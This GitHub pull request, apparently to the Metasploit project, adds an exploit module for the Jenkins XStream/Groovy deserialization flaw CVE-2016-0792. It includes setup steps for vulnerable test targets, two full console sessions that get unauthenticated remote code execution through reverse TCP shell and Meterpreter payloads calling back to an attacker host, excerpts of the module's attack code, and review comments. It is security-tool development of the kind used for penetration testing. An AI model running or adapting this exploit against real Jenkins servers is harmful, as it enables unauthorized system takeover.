### PR TITLE
Add Jenkins XStream Groovy classpath Deserialization Vulnerability

### PR DESCRIPTION
**Pull request by attackdebris**
Add Jenkins XStream Groovy classpath Deserialization Vulnerability. This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability.

## Installation
Download Jenkins (Windows) < version 1.650 from here:
http://mirrors.jenkins-ci.org/windows/

Windows Installation: Double click .msi

Download Jenkins LTS (Debian) < version 1.642.2 from here:
https://pkg.jenkins.io/debian-stable/

Download Jenkins (Debian) < version 1.650 from here:
https://pkg.jenkins.io/debian/

Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb`

Note: For the `check` only used `appears` because cannot differentiate from HTTP headers which Jenkins line is running.

## Nix Verification (Targeting Jenkins 1.642.1 LTS):
```
msf > use exploit/multi/http/jenkins_xstream_deserialize
msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.64
RHOST => 192.168.1.64
msf exploit(jenkins_xstream_deserialize) > check
[*] 192.168.1.64:8080 The target appears to be vulnerable.
msf exploit(jenkins_xstream_deserialize) > set target 2
target => 2
msf exploit(jenkins_xstream_deserialize) > set payload linux/x64/shell/reverse_tcp 
payload => linux/x64/shell/reverse_tcp
msf exploit(jenkins_xstream_deserialize) > set LHOST 192.168.1.176 
LHOST => 192.168.1.176
msf exploit(jenkins_xstream_deserialize) > exploit

[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Sending stage (38 bytes) to 192.168.1.64
[*] Command Stager progress - 100.00% done (782/782 bytes)
[*] Command shell session 1 opened (192.168.1.176:4444 -> 192.168.1.64:51100) at 2017-11-07 09:32:27 -0500

id 
uid=117(jenkins) gid=122(jenkins) groups=122(jenkins)
```

## Windows Verification (Targeting Jenkins 1.649):
```
msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37
RHOST => 192.168.1.37
msf exploit(jenkins_xstream_deserialize) > check
[*] 192.168.1.37:8080 The target appears to be vulnerable.
msf exploit(jenkins_xstream_deserialize) > set target 3
target => 3
msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(jenkins_xstream_deserialize) > exploit

[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (205379 bytes) to 192.168.1.37
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
[*] Meterpreter session 2 opened (192.168.1.176:4444 -> 192.168.1.37:50521) at 2017-11-07 09:36:15 -0500

meterpreter > sysinfo
Computer        : DESKTOP-BLAH
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
## Other Notes:
Also tested successfully against Jenkins version 1.645 (Nix)
Windows Defender disabled for Windows 10 test target above
Allocate a good amount of RAM for Jenkins installs (at least 2GB)
Heavily borrowed code from the `struts2_rest_xstream` module so credit to authors

### CODE REVIEW

File: modules/exploits/multi/http/jenkins_xstream_deserialize.rb [hunk 1]
```diff
@@ -0,0 +1,140 @@
...
+    when /Windows/
+      %W{cmd.exe /c #{cmd}}
+    end
+
+    # Encode each command argument with XML entities
+    cmd.map! { |arg| arg.encode(xml: :text) }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/createItem?name=random'),
```
Comment (wvu-r7) [inline modules/exploits/multi/http/jenkins_xstream_deserialize.rb]: You can use `vars_get` for the `name` parameter.

File: modules/exploits/multi/http/jenkins_xstream_deserialize.rb [hunk 2]
```diff
@@ -0,0 +1,140 @@
...
+          [
+            'Arshan Dabirsiaghi', 			# Vulnerability discovery
+            'Matt Byrne <attackdebris[at]gmail.com>'    # Metasploit module
+          ],
+      'DisclosureDate' => 'Feb 24 2016',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+          [
+            ['CVE', '2016-0792'],
+            ['URL', 'https://https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
```
Comment (wvu-r7) [inline modules/exploits/multi/http/jenkins_xstream_deserialize.rb]: Doubled up on `https://`.

**Comment by attackdebris** [comment]
Good spot with the double https...oops! get_vars added too. Thanks.

**Comment by wvu-r7** [comment]
# Release Notes

> This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution.

**Comment by wvu-r7** [comment]
#8924

**Pull request merged**